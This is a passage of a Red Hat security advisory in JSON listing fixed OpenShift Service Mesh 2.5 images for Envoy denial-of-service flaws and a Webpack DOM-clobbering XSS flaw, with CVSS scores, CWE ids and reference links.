"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
